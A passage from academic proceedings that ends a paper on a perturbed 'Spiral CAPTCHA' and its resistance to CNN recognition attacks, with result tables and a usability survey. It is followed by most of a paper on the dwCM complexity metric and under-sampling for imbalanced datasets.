was run for 10 and 50 epochs.

3.4 Training a CNN with Training Datasets and Testing it


with Testing Datasets

Our dataset was passed through CNN for training, validation, and testing purpose. We
used a laptop with 2.59 GHz Intel core i7 processor and 4 GB RAM with Windows
10, 64-bit operating system. Python version 3.7 used with Keras and Tensorflow 2.1.0
as backend. CNN was trained with 8027 image dataset, validated for 3441 images,
and tested for the randomly chosen batches of 64, 128, 256, and 512 from testing
dataset of 4916 images. Prediction of few images without adding perturbation is
given in Fig. 6.

3.5 Adding Perturbation to Image Dataset and Testing CNN


Again with Perturbed Data

Testing images then perturbed with IAN mentioned in previous section and tested
with CNN for recognition. The perturbed image and original image almost look same,
and user can easily recognize image without any difficulty, but in case of CNN, the
perturbation leads to misclassification. The image without and with perturbation can
be seen in Fig. 7 with the noise factor up to 2.95. Out of which 1.35 (Fig. 7h) is
76 Shivani and C. R. Krishna

(a) Plain Image (b) Perturbation (c) Perturbed Image, epsilon = 0.35 (d) Perturbed Image, epsilon = 0.55

(e) Perturbed Image, epsilon = 0.75 (f) Perturbed Image, epsilon = 0.95 (g) Perturbed Image, epsilon = 1.15 (h) Perturbed Image, epsilon = 1.35

(i) Perturbed Image, epsilon = 1.55 (j) Perturbed Image, epsilon = 1.75 (k) Perturbed Image, epsilon = 1.95 (l) Perturbed Image, epsilon = 2.15

(m) Perturbed Image, epsilon = 2.35 (n) Perturbed Image, epsilon = 2.55 (o) Perturbed Image, epsilon = 2.75 (p) Perturbed Image, epsilon = 2.95

Fig. 7 Image without and with perturbation

chosen as threshold value for proposed work because noise above that seems to be
more visible to the user and loses its purpose of not to be recognized by user. Figure 8
shows the prediction of CNN on perturbed images with epsilon value 1.35.

Fig. 8 Prediction on dataset with perturbation


Spiral CAPTCHA with Adversarial Perturbation and Its Security … 77

4 Performance Parameters

Following performance metrics have been used to evaluate the performance of


proposed Spiral CAPTCHA:
a. Recognition Rate (RR): It is defined as the percentage of average extent of
recognition of individual character by CNN and is given by Eq. 1.

Nr
RR = × 100 (1)
Nn
b. Recognition Speed (RS): It is defined as the average time (in seconds) to
recognize individual character and is given by Eq. 2.

Ta
RS = × 100 (2)
Nn
c. Success Rate (SR): It is defined percentage of average extent of recognition of
full CAPTCHA by CNN and is given by Eq. 3.

Nr c
SR = × 100 (3)
N
d. Attack Speed (AS): It is defined as the total time taken to recognize full
CAPTCHA.
Where
Nr: Number of characters recognized correctly per CAPTCHA.
Nn: Total number of characters per CAPTCHA.
Ta: Time taken to recognize all characters in CAPTCHA.
Nrc: Number of CAPTCHAs recognized correctly by CNN.
N: Total number of CAPTCHAs used as dataset.

5 Results and Discussion

Results of proposed CAPTCHA have been taken with and without noise over the
parameters mentioned in previous section.
Testing was performed on randomly permuted images from 4916 samples in the
form of batches of 64, 128, 256, and 512. Testing performed with different epochs
initially 10 then 50. Following results were found:
78 Shivani and C. R. Krishna

Table 1 Results for spiral CAPTCHA without perturbation


Epochs → 10 50
Batch size → 64 128 256 512 64 128 256 512
RR % 35.42 37.63 38.48 36.91 33.33 35.94 37.04 36.75
SR % 0 0 0 0.19 0 0 0 0.19
RS (µs) 842 1807 1125 1050 798 978 1003 1063
AS (µs) 5054 10,842 6751 6298 4787 5866 6017 6378

5.1 Results for Spiral CAPTCHA without Perturbation

Table 1 shows the results of four parameters taken for analysis for the images without
perturbation. The results show that for 10 epochs and 50 epochs, all four parameters
have small variation for all batches, i.e., 64–512. In case of images without perturba-
tion, recognition rate (RR) has maximum value 38.48% on 10 epochs and 256 data
batch and minimum value 33.33% on 50 epochs for 64 data batch. Success rate (SR)
has maximum value 0.19% for batch size 512 for both epochs 10 and 50. Recognition
speed (RS) and attack speed (AS) are fastest with 798, 4787 micro seconds on batch
size 64 for 50 epochs and slowest with 1807, 10,842, respectively, micro seconds on
batch size 128 for 10 epochs.

5.2 Results for Spiral CAPTCHA with Perturbation

Table 2a shows the RR and SR results for perturbed images. Here the minimum RR
is 11.48% on 64 batch size, 2.35 epsilon and for 50 epochs and maximum is 29.82%
on 128 batch size, 0.15 epsilon and 50 epochs. But, we considered the maximum
RR is 13.50% on 512 batch size for 1.35 epsilon and for 10 epochs. The reason to
choose this is because we have considered 1.35 as threshold value of epsilon beyond
this value the noise is more visible, and user can easily recognize it. But our aim is
that noise should not be recognized by the user. SR is 0% in all cases. This means
perturbed images are not recognized by CNN. In Table2b, RS and AS are fastest
with 802 and 4812 micro seconds, respectively, on batch size 64 for epsilon equals
to 2.35, but we selected 899 and 5395 microseconds on batch size 128 for epsilon
equals to 0.95 due to threshold value of epsilon.

6 Usability and Security

To check the usability of the proposed CAPTCHA, a survey was performed with 130
engineering students of 3rd and 4th year along with 50 general office staff with no
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 79

Table 2 a Recognition rate and success rate for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (%) 64 128 256 512 64 128 256 512
RR Epsilon
0.15 28.65 29.82 29.36 27.60 25.78 29.30 29.69 28.81
0.35 23.96 25.52 25.59 23.57 21.88 24.74 25.85 25.26
0.55 19.27 20.96 21.42 19.99 19.01 21.61 23.05 21.10
0.75 18.23 18.75 19.47 17.90 17.71 18.88 20.77 19.86
0.95 16.93 17.06 18.03 16.47 17.45 17.06 19.21 18.36
1.15 15.63 15.49 16.02 14.84 15.63 15.50 16.99 16.70
1.35 14.32 14.19 14.45 13.50 13.80 14.20 15.49 15.40
1.55 13.97 13.45 14.09 13.05 12.77 13.64 14.75 15.03
1.75 13.23 13.65 13.95 13.40 12.25 14.14 14.40 14.57
1.95 12.85 12.64 13.90 12.52 12.91 13.57 14.88 14.33
2.15 11.90 12.41 12.20 12.47 12.87 12.27 14.85 13.12
2.35 11.67 11.74 12.96 11.76 11.48 12.29 15.48 13.43
SR 0.15 0 0 0 0 0 0 0 0
0.35 0 0 0 0 0 0 0 0
0.55 0 0 0 0 0 0 0 0
0.75 0 0 0 0 0 0 0 0
0.95 0 0 0 0 0 0 0 0
1.15 0 0 0 0 0 0 0 0
1.35 0 0 0 0 0 0 0 0
1.55 0 0 0 0 0 0 0 0
1.75 0 0 0 0 0 0 0 0
1.95 0 0 0 0 0 0 0 0
2.15 0 0 0 0 0 0 0 0
2.35 0 0 0 0 0 0 0 0
b Recognition speed and attack speed for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (µs) 64 128 256 512 64 128 256 512
RS 0.15 958 912 931 1026 1144 947 950 929
0.35 1004 947 922 981 1087 916 911 941
0.55 966 913 926 999 1282 948 909 964
0.75 990 920 942 978 1082 929 911 961
0.95 1000 925 899 937 1280 937 916 949
1.15 1013 936 928 952 1198 903 914 956
1.35 980 950 929 918 1154 916 955 957
(continued)
80 Shivani and C. R. Krishna

Table 2 (continued)
b Recognition speed and attack speed for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (µs) 64 128 256 512 64 128 256 512
1.55 1102 1007 897 1186 801 1098 1151 1154
1.75 988 941 929 1055 951 836 1037 878
1.95 1086 1176 960 897 961 1055 1006 996
2.15 1200 917 903 834 923 909 1132 970
2.35 1073 1077 928 1143 802 1009 803 949
AS 0.15 5748 5475 5584 6157 6866 5681 5103 5574
0.35 6022 5684 5533 5887 6527 5498 5464 5648
0.55 5797 5476 5557 5993 7690 5687 5456 5785
0.75 5942 5523 5651 5866 6494 5572 5468 5767
0.95 5998 5553 5395 5621 7682 5621 5495 5695
1.15 6077 5617 5567 5713 7188 5416 5486 5737
1.35 5882 5697 5576 5509 6927 5497 5732 5704
1.55 6612 6042 5382 7116 4806 6588 6906 6924
1.75 5928 5646 5574 6330 5706 5016 6222 5268
1.95 6516 7056 5760 5382 5766 6330 6036 5976
2.15 7200 5502 5418 5004 5538 5454 6792 5820
2.35 6438 6462 5568 6858 4812 6054 4818 5694
Note: SR 0% for all value of Epsilon and batch size show that CNN did not predict any Spiral
CAPTCHA image right. Therefore, 0% SR

technical background. Each person were asked to guess 5 CAPTCHAs at random


with the statements given in Table 3.
It has been found that only 11% of people, i.e., 19 people out of 180 found the
Spiral CAPTCHA challenging to solve and 7%, i.e., 13 people found it very easy.
Further 28% people found it easy, 22% found it normal and 32% found it tough. The
inputs acquired from the respondents prove that Spiral CAPTCHA is usable. Table
3 shows the survey results.

Table 3 Survey results for


Statements Percentage of people
usability test
Very easy 7
Easy 28
Normal 22
Tough 32
Vary tough 11
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 81

Table 4 Attack results on


Website Success Rate (%)
different CAPTCHA schemes
[4] Apple 47.3
Yandex 56.0
reCAPTCHA 10.1
QQ 47.2
Microsoft one layer CAPTCHA 50.9
Wikipedia 90.0
Sina 75.0
PayPal 67.4
Microsoft two-layer CAPTCHA 65.8
Weibo 51.2
Baidu 57.0

However, security of the Spiral CAPTCHA can be seen by analyzing the results of
Tables 1 and 2a, b. Both shows that success rate for guessing the CAPTCHA is 0% in
almost all cases. This shows that proposed CAPTCHA is robust against recognition
attacks.
Spiral CAPTCHA shows a maximum success rate of 0.19% for the images without
perturbation and 0% for images with perturbation. This shows that spiral shape and
adding IAN to the CAPTCAH makes it strong enough to stand against recognition
attacks. Also, it can be seen that Spiral CAPTCHA is more secure when compared
with the other CAPTCHA schemes as shown by Mengyun et al. [4]. Authors have
attacked different CAPTCHA schemes of top 50 websites and attained a good success
rate for these schemes. Attack results for success rate of various schemes are shown
in Table 4.
Lowest success rate is against reCAPTCHA which is 10.0%. But in Spiral
CAPTCHA success rate is 0.19% maximum for the images without perturbation.
Hence, Spiral CAPTCHA is considered to be more secure than the presently available
CAPTCHA schemes. Therefore, designing CAPTCHA with spiral shape and adding
intelligent perturbation to the Spiral CAPTCHA makes it robust against recognition
attacks.

7 Concluding Remarks

A novel CAPTCHA writing scheme called Spiral CAPTCHA is presented, which is


further perturbed with IAN. A dataset of 16,384 images in PNG format was created.
Out of which 8027 images were used for training, 3441 for validation and remaining
4916 for testing purpose. A maximum recognition rate achieved for CAPTCHA
without perturbation is 38.48% and with perturbation is 13.50%. However, success
82 Shivani and C. R. Krishna

rate is very low (almost 0%) for both cases, i.e., 0.19% for images without perturba-
tion and 0% for images with perturbation. This prediction for proposed CAPTCHA is
wrong most of the time. Maximum recognition rate is also very small with 39.48% for
images without perturbation and 29.82% with perturbation. This means that only one
or two characters are recognized exactly in few CAPTCHAs on an average. Hence,
it is demonstrated that the proposed Spiral CAPTCHA is robust against recognition
attacks and is usable practically.

References

1. Ahn Von, L., Blum, M., Hopper, N. J., & Langford, J. (2003). CAPTCHA: Using hard AI
problems for security. In Advances in Cryptology—EUROCRYPT 2003 (pp 294–311)
2. Bursztein, E., Martin, M., & Mitchell, J. (2011). Text-based CAPTCHA strengths and weak-
nesses. In Proceedings 18th ACM Conference Computer Communication Security—CCS 11,
(pp 125).
3. Lee, L. Y., & Hsu, H. C. (2011). Usability study of text-based CAPTCHAs. In Displays (pp
81–86).
4. Tang, M., Gao, H., Zhang, Y., Liu, Y., Zhang, P., & Wang, P. (2018). Research on deep
learning techniques in breaking text-based Captchas and designing image-based Captcha. IEEE
Transactions on Information Forensics and Security, 2522–2537.
5. Yan, J., Salah, A., & Ahmad, E. (2011). Captcha perspective. In Computer (pp 54–60).
6. Yan, J., & Ahmad El, S. A. (2009). CAPTCHA security: A case study. IEEE Security & Privacy,
22–28.
7. Chalil, K., Greenstein, S. J., & Horan, K. (2019). International journal of industrial ergonomics
empirical studies to investigate the usability of text- and image-based CAPTCHAs. Interna-
tional Journal of Industrial Ergonomics, 200–208.
8. Bursztein, E., Aigrain, J., Moscicki, A., & Mitchell, C. J. (2014). The end is nigh: Generic
solving of text-based CAPTCHAs. In Usenix Woot (pp. 3).
9. Szegedy, C., Bruna, J., Erhan, D., & Goodfellow, I. (2014). Intriguing properties of neural
networks. In arXiv:1312.6199[cs.CV] (pp. 1–10).
10. Osadchy, M., Hernandez-Castro, J., Gibson, S., Dunkelman, O., & Perez-Cabo, D. (2017).
No bot expects the deep CAPTCHA! Introducing immutable adversarial examples, with
applications to CAPTCHA generation. Transactions on Information Forensics and Security,
2640–2653.
11. Lin, D., Lin, F., Lv, Y., Cai, F., & Cao, D. (2018). Chinese character CAPTCHA recognition
and performance estimation via deep neural network. Neurocomputing, 11–19.
12. Roshanbin, N., & Miller, J. (2016). ADAMAS: Interweaving unicode and color to enhance
CAPTCHA security. Future Generation Computer Systems, 289–310.
13. Nguyen, D. V., Chow, W. Y., & Susilo, W. (2014) On the security of text-based 3D CAPTCHAs.
Computer & Security, 84–99.
14. Schryen, G., Wagner, G., & Schlegel, A. (2016). Development of two novel face-recognition
CAPTCHAs: A security and usability study. Computers & security, 95–116.
15. Lee, S. J., & Hsieh, H. M. (2013). Preserving user-participation for insecure network
communications with CAPTCHA and visual secret sharing technique. IET Networks, 81–91.
16. Hernandez-Castro, J. C., Moreno, R. D. M., & Barrero, F. D. (2015). Using JPEG to measure
image continuity and break capy and other puzzle CAPTCHAs. IEEE Internet Computing,
46–53.
17. Gao, H., Tang, M., Liu, Y., Zhang, P., & Liu, X. (2017). Research on the security of microsoft’s
two-layer Captcha. Transactions on Information Forensics and Security, 1671–1685.
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 83

18. Zhu, B. B., Yan, J., Bao, G., Yang, M., & Xu, N. (2014). Captcha as graphical passwords—A
new security primitive based on hard AI problems. Transactions on Information Forensics and
Security, 891–904.
19. Beheshti, S. R. M. S., Liatsis, P., & Rajarajan, M. (2017). A CAPTCHA model based on visual
psychophysics: Using the brain to distinguish between human users and automated computer
bots. In Computers & security, 596–617.
20. Ogiela, R. M., Krzyworzeka, N., & Ogiela, L. (2018). Application of knowledge-based cogni-
tive CAPTCHA in cloud of things security. In Concurrency and Computation: Practice and
Experience, 30, e4769. https://doi.org/10.1002/cpe.4769
21. Khattar, S., & Rama Krishna, C. (2020). Adversarial attack to fool object detector. Journal of
Discrete Mathematical Sciences and Cryptography, 547–562.
22. Wang, P., Gao, H., Shi, Z., Yuan, Z., & Hu, J. (2020). Simple and easy: Transfer learning-based
attacks to text CAPTCHA. IEEE Access, 1–1.
23. Kirkbride, P., Dewan, A. A. M., & Lin, F. (2020). Game-like Captchas for intrusion detection
game-like Captchas for intrusion detection. In International Conference on Cyber Science and
Technology Congress (pp. 312–315).
24. Noury, Z., & Rezaei, M. (2020). Deep-CAPTCHA: A deep learning based CAPTCHA solver
for vulnerability assessment. arXiv:2006.08296
25. Jafar, A. A., Ambeshwar, K., Omar, A. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 267–272.
26. Aditya, K., Deepak, G., Nhu, G. N., Ashish, K., Babita, P., & Prayag, T. (2019). Sound clas-
sification using convolutional neural network and tensor deep stacking network. IEEE Access,
7717–7727.
Predicting Classifiers Efficacy in Relation
with Data Complexity Metric Using
Under-Sampling Techniques

Deepika Singh, Anju Saha, and Anjana Gosain

Abstract In imbalanced classification tasks, the training datasets may suffer from
other problems like class overlapping, small disjuncts, classes of low density, etc.
In such a situation, the learning for the minority class is imprecise. Data complexity
metrics help us to identify the relationship between classifier’s learning accuracy and
dataset characteristics. This paper presents an experimental study for imbalanced
datasets wherein dwCM complexity metric is used to group the datasets based on the
complexity level, thereafter the behavior of under-sampling based pre-processing
techniques are analyzed for these different groups of datasets. Experiments are
conducted on 22 real life datasets with different levels of imbalance, class over-
lapping and density of the classes. The experimental results show that these groups
formed using dwCM metric can better explain the difficulty of imbalanced datasets
and help in predicting the response of the classifiers to the under-sampling algorithms.

Keywords Class imbalance · Data complexity metric · Sampling techniques ·


Under-sampling · Over-sampling

1 Introduction

A vital issue that has been acknowledged widely in machine learning community is of
skewed datasets, that is, the number of samples of one class (called as majority class)
outperforms the number of samples in the other class(es) (called as minority class).
Such skewed datasets are referred as imbalanced datasets and the problem thus called
as class imbalance problem. The class imbalance problem causes difficulty for many
classifying algorithms since the classifiers are often biased toward the majority class
[1]. Many methods have been proposed to deal with this problem [2–9]. However,
studies suggest that the class imbalance is not only responsible for the significant
degradation of the performance on individual classes but also there are certain other
internal factors of the dataset that when occurs together with the class imbalance can

D. Singh (B) · A. Saha · A. Gosain


USICT, Guru Gobind Singh Indraprasth University, New Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 85
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_7
86 D. Singh et al.

lead to serious drop of the classifier accuracy, especially for the minority class. These
internal difficulty factors are: small disjuncts, small dataset size, overlaps between
the minority and majority classes and class separability. Recently, researchers have
started using the data complexity metrics to describe the difficulty factors for datasets
for classification problems [10–18]. These data complexity metrics try to quantify
different aspects or sources of data particularities which are considered difficult to
the classification task [10].
However, the existing complexity metrics do not work well in case of imbalanced
datasets. In [19], the authors proposed the complexity metrics: wCM and dwCM,
for imbalanced datasets. With the series of experiments, we have shown that these
proposed metrics help to identify the difficulty level of the imbalanced dataset and
thus proved useful to decide whether class balancing algorithms are required to
improve performance of the base classifiers.
In this paper, we have used the dwCM complexity metrics to inspect the association
between the poor efficacy of the classifiers and the intrinsic features of the dataset. Our
contributions in this paper are: (a) estimating difficulty level for imbalanced datasets
using dwCM (b) to explore the competence of different under-sampling algorithms to
deal with the internal data factors. In order to study the impact of dataset complexity
on the performance of classifiers using under-sampling pre-processing methods, we
grouped the datasets on the basis of the dwCM complexity metric. We choose five
dwCM ranges for our comparisons, defined as: dwCM ≤ 20%, 21% ≤ dwCM ≤
30%, 31% ≤ dwCM ≤ 40%, 41% ≤ dwCM ≤ 50% and dwCM > 50%, respectively.
The rest of the paper is organized as follows. Section 2 presents the related works
for data complexity metrics. Section 3 explains the proposed work for this paper.
Section 4 discusses the experimental study and the results obtained for the under-
sampling techniques applied on different groups of datasets. Section 5 provides the
conclusion of this paper.

2 Related Works

The data complexity metrics quantify particular aspects of a dataset, which helps
in selecting the appropriate classification algorithm. Basu and Ho [10] studied the
relationship between the overall classification performance and the intrinsic char-
acteristics of data and they proposed the taxonomy of the data complexity metrics,
which served as keystone for categorizing the data mining problems. Several other
studies [20, 21] have investigated the use of these metrics to analyze the classification
problems.
On the other hand, most studies [16–18, 22–25] have shown that the existing
data complexity metrics perform poorly in imbalanced scenarios. Moreover, recently
some of the metrics have been proposed [16, 19, 22, 24, 25] for accessing
the complexity of imbalanced datasets. A scatter matrix based class separability
complexity metric for imbalanced datasets was proposed by Xing et al. [24]. Another,
metric for imbalanced dataset based on k-nn approach was given by Anwar et al.
Predicting Classifiers Efficacy in Relation with Data Complexity … 87

[16]. Further, Fernandez et al., [17] suggested a method based on feature selec-
tion and instance selection, to overcome class overlap and class imbalance. Diez-
Pastor et al. [26] used them to predict data complexity intervals for which some
diversity-enhancing techniques may improve the results of an ensemble method.
Barella et al., [22] presented three complexity metrics, adapted from the famous
complexity metrics, for imbalanced datasets by regarding each class individually.

3 Proposed Work

In this paper, we study the relationship of dwCM complexity metric and the classifiers
with and without using under-sampling based pre-processing methods. In order to
study the impact of dataset complexity on the performance of classifiers, we grouped
the datasets on the basis of dwCM complexity metric value (we have considered
the datasets and dwCM metric values calculated in the research paper [19]). Based
on the previous computed values of the dwCM metric, the different dwCM ranges
considered in this paper are defined as: dwCM ≤ 20% (not complex), 21 ≤ dwCM ≤
30% (very less complex), 31 ≤ dwCM ≤ 40% (less complex), 41 ≤ dwCM ≤ 50%
(complex) and dwCM > 50% (highly complex).
In this study, we have considered four different base classifiers to evaluate dataset
complexity: k-nearest neighbor (k-nn) with k = 3, classification tree (CT), support
vector machines (SVMs) using linear kernel and logistics regression (LR). All four
classifiers are executed using Matlab classification learner app tool. The under-
sampling algorithms used in this paper are: Tk-Links [27], CNN [28], OSS [29]
and NCL [30]. In order to study the effect of these under-sampling algorithms and
to measure the performance of classifier for different dataset groups, we have used
sensitivity measure because it provides information about proper classification of
minority class. Also, we have used specificity measure to calculate the correct accu-
racy for majority class and accuracy measure to measure the overall accuracy of the
classifiers.

4 Experimental Results

An overall goal of this experimental study is to check the effectiveness of dwCM


complexity metric for imbalanced datasets using different classifiers. In order to
fairly assess performance of the classification algorithms, we have done fivefold
cross validation on the datasets.
88 D. Singh et al.

Table 1 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
on the original imbalanced datasets divided into different categories using dwCM complexity metric
Classifer Datasets groups based on dwCM Sensitivity Specificity Accuracy
(%)
k-nn <20 0.9643 (0.035) 0.995 (0.01) 0.9845 (0.02)
20–30 0.73 (0.059) 0.92 (0.09) 0.9045 (0.11)
31–40 0.577 (0.11) 0.9525 (0.069) 0.86475 (0.073)
41–50 0.5563 (0.048) 0.9451 (0.074) 0.901 (0.12)
>50 0.2666 (0.12) 0.9226 (0.06) 0.8342 (0.11)
CT <20 0.9262 (0.11) 0.9796 (0.025) 0.96525 (0.05)
20–30 0.6268 (0.003) 0.934 (0.08) 0.8885 (0.134)
31–40 0.6748 (0.16) 0.9048 (0.09) 0.872 (0.11)
41–50 0.5869 (0.07) 0.9468 (0.07) 0.9093 (0.12)
>50 0.2943 (0.24) 0.9079 (0.08) 0.8291 (0.103)
SVM <20 0.9058 (0.12) 0.978 (0.044) 0.9585 (0.06)
20–30 0.6268 (0.003) 0.9028 (0.098) 0.8645 (0.14)
31–40 0.5725 (0.003) 0.9157 (0.098) 0.8465 (0.14)
41–50 0.0388 (0.067) 0.9947 (0.009) 0.913 (0.13)
>50 0.0809 (0.13) 0.9709 (0.04) 0.8419 (0.11)
LR <20 0.9276 (0.107) 0.9691 (0.04) 0.96 (0.05)
20–30 0.6125 (0.018) 0.9201 (0.09) 0.8705 (0.14)
31–40 0.5925 (0.11) 0.9168 (0.08) 0.8525 (0.001)
41–50 0.3703 (0.05) 0.965 (0.063) 0.9037 (0.12)
>50 0.2125 (0.19) 0.9563 (0.04) 0.8431 (0.09)

4.1 Results and Discussion

Table 1 (2nd column), shows different complexity groups we used in this study and
for every group, the average values for the sensitivity, specificity and accuracy are
shown along with the standard deviation values. Table 1 column 3, for the datasets
in the groups like 31 ≤ dwCM ≤ 40%, 41 ≤ dwCM ≤ 50% and dwCM > 50%,
the sensitivity values show the decrease with the increasing complexity. For these
groups, the sensitivity is less than 0.30 for the k-nn, CT and LR classifiers and
is the worst for SVM classifier (i.e., 0.08), whereas for the groups like: dwCM <
20% and 21 ≤ dwCM ≤ 30%, the sensitivity values seem to be good (more than
0.90 for dwCM < 20% group, for all the classifiers and for 21 ≤ dwCM ≤ 30%
group, more than 0.60 for all the classifiers) without applying any pre-processing
algorithms. As it can be observed from these results that the behavior of classifiers
on less complex data sets is better and more uniform than on categories of problems
of higher complexity: in group dwCM < 20%, almost all classifiers seem to be robust
to the imbalance problem. SVM and LR performances rapidly degrade (increasing
Predicting Classifiers Efficacy in Relation with Data Complexity … 89

difference between sensitivity and specificity) with increasing complexity, which


shows that LR and SVM are more sensitive to complex and highly complex dataset
groups. Classification tree (CT) is generally more robust than k-nn classifier to the
complex imbalanced datasets.
Table 2, shows the experimental results for the classifiers after applying the pre-
processing algorithms like NCL, CNN, OSS and Tk-Links. Here, the results are
shown only for the pre-processing algorithm which tends to result in the highest sensi-
tivity value. From the results, it is apparent that for the groups with the high dwCM
metric value, the under-sampling algorithms result in the compromise between
the sensitivity and specificity values. These under-sampling algorithms although
increases the sensitivity value, but the corresponding specificity value suffers accord-
ingly. This implies that the use of these under-sampling algorithms seriously compro-
mise the accuracy of the majority class, especially for the datasets in the groups: 41
≤ dwCM ≤ 50% and dwCM > 50%.

5 Conclusion

In this work, we have analyzed the pre-processing effect of imbalanced datasets


by means of dwCM complexity metric. We have considered four under-sampling
techniques: OSS, CNN, NCL and Tk-Links. We have observed that imbalance ratio
is not the only factor responsible for the poor performance of classifiers for minority
class. However, the classifier learning is also based on the other dataset factors
such as class overlapping, small disjuncts, noise and borderline examples. We have
grouped the datasets into different categories based on the level of complexity of
dataset, which we have measured through dwCM metric. The complexity metric
proved useful in identifying the complexity of datasets. The datasets in the first two
groups (i.e., dwCM < 20% and 21% ≤ dwCM ≤ 30%) shows good sensitivity values
for minority class, thus do not require any pre-processing technique. However, the
datasets in the other three groups shows degraded sensitivity values for the different
classifiers, and applying under-sampling techniques to these complex groups have
helped us to improve the learning for minority class.
90 D. Singh et al.

Table 2 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
after applying under-sampling algorithms on the original datasets divided into different categories
using dwCM complexity metric
Classifer Datasets groups Under-sampling Sensitivity Specificity Accuracy
based on dwCM algorithm
(%)
k-nn <20 OSS 0.9775 (0.045) 0.994 (0) 0.9818
(0.028)
20–30 OSS 0.905 (0.19) 0.86 (0.14) 0.87 (0.24)
31–40 NCL 0.7855 (0.08) 0.8625 0.8255
(0.09) (0.09)
41–50 NCL 0.8723 (0.13) 0.7417 0.8637
(0.14) (0.15)
>50 NCL 0.7411 (0.09) 0.7028 0.584
(0.06) (0.22)
CT <20 CNN 0.9775 (0.045) 0.9875 0.9838
(0.025) (0.03)
20–30 NCL 0.9357 (0.13) 0.9438 0.9405
(0.11) (0.11)
31–40 OSS 0.7725 (0.18) 0.8897 0.8005
(0.02) (0.11)
41–50 NCL 0.7567 (0.17) 0.769 (0.11) 0.7643
(0.13)
>50 NCL 0.6856 (0.06) 0.6532 0.6698
(0.04) (0.04)
SVM <20 NCL 0.97 (0.045) 0.97 (0.05) 0.9598
(0.063)
20–30 OSS 0.97 (0.06) 0.843 (0.19) 0.8205
(0.27)
31–40 NCL 0.7639 (0.096) 0.8797 0.7763
(0.14) (0.12)
41–50 NCL 0.812 (0.12) 0.8547 0.7927
(0.13) (0.13)
>50 NCL 0.6731(0.09) 0.6711 0.6494
(0.13) (0.08)
LR <20 CNN 0.9775 (0.045) 0.9875 0.9685
(0.025) (0.063)
20–30 NCL 0.83 (0.24) 0.83 (0.22) 0.775
(0.336)
31–40 Tk_Link 0.7195 (0.13) 0.7943 0.757
(0.14) (0.12)
41–50 OSS 0.7527 (0.07) 0.7873 0.7693
(0.13) (0.09)
>50 NCL 0.5989 (0.16) 0.7566 0.6739
(0.07) (0.07)
Predicting Classifiers Efficacy in Relation with Data Complexity … 91

References

1. Branco, P., Torgo, L., & Ribeiro, R. P. (2016). A survey of predictive modeling on imbalanced
do- mains. ACM Computing Surveys, 49(2), 1–50.
2. Gosain A, Saha A, & Singh, D. (2016). Analysis of sampling based classification techniques
to overcome class imbalancing. In Proceedings 3rd international conference on computing for
sustainable global development (INDIACom) IEEE pp. (7320–7326).
3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). Smote: Synthetic
minority over-sampling technique. The Journal of Artificial Intelligence Research, 16, 321–357.
4. Estabrooks, A., & Jo, T., Japkowicz, N. (2004). A multiple resampling method for learning
from imbalanced data sets. Journal Computational intelligence, 20(1).
5. Gracia, S., & Herrera, F. (2009). Evolutionary undersampling for classification with imbal-
anced datasets: Proposals and taxonomy. Journal Evolutionary computation, 17, 275–306.
6. Anand, R., Mehrotra, K., Mohan, C., & Ranka, S. (1993). An improved algorithm for neural
net- work classification of imbalanced training sets, IEEE Trans. Neural Networks, 4, 962–969.
7. Bruzzone, L., & Serpico, S. (1997). Classification of imbalanced remote-sensing data by neural
networks. Pattern Recognition Letters, 18, 1323–1328.
8. Domingos, P. (1999). Metacost: A general method for making classifiers cost sensitive. In
Proceedings of fifth ACM SIGKDD international conference on knowledge discovery and data
mining, KDD ’99 (pp. 155–164). ACM, New York.
9. Zhou, Z.-H., & Liu, X.-Y. (2006). Training cost-sensitive neural networks with methods ad-
dressing the class imbalance problem. IEEE Transactions on knowledge and data engineering,
18, 63–77.
10. Basu, M., & Ho, T.K. (2006). Data complexity in pattern recognition. In Advance information
and knowledge processing. Springer.
11. Bernado-Manshilla, E., & Ho, T. K. (2005). Domain of competence of XCS classifier system
in complexity measurement space. IEEE Transactions on Evolutionary Computation, 9(1),
82–104.
12. Li, Y., Member, S., & Dong, M. (2005). Classificability-based omnivariate decision trees. IEEE
Transactions on Neural Networks, 16(6), 1547–1560.
13. Baumgartner, R., & Somorjai, R. L. (2006). Data complexity assessment in undersampled
classification of high-dimensional biomedical data. Pattern Recognition Letters, 12, 1383–
1389.
14. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Intelligent Data Analysis, 18, 203–216.
15. Gracia, S., Cano, J. R., Bernado-Mansilla, E., & Herrera, F. (2009). Diagnose of effective
evolutionary prototype selection using an overlapping measure. International Journal of Pattern
Recognition and Artificial Intelligence, 23(8), 2378–2398.
16. Anwar, N., Jones, G., & Ganesh, S. (2014). Measurement of data complexity for classification
problems with unbalanced data. Statistical Analysis and Data Mining, 7(3), 194–211.
17. Fernandez, L.M., Canedo, V.B., & Betanzos, A.A. (2016). Data complexity measures for
analyzing the effect of SMOTE over microarrays. In Proceedings European Symposium on
artificial neural networks, computational intelligence and machine learning (pp. 289–294).
18. Fernandez, L. M., Canedo, V. B., & Betanzos, A. A. (2017). Can classification performance
be predicted by complexity measures? A study using microarray data. International Journal
Knowledge and Information Systems, Springer, 51(3), 1067–1090.
19. Singh, D., Gosain, A., & Saha, A. (2020). Weighted k-nearest neighbor data complexity metrics
for imbalanced datasets. Journal of Statistical Analysis and Data Mining. https://doi.org/10.
1002/sam.11463
20. Jo, T., & Japkowicz, N. (2004). Class Imbalances versus small disjuncts. ACM SIGKDD Ex-
plorations Newsletter, 6(1), 40–49.
21. Denil, M., Trappenberg, T.P. (2010). Overlap versus imbalance. In Canadian conference on AI
(pp. 220–231).
92 D. Singh et al.

22. Barella, V. H., Garcia, L.P.F., De Souto, M.P., Lorena, A.C., & De Carvalho, A. (2018). Data
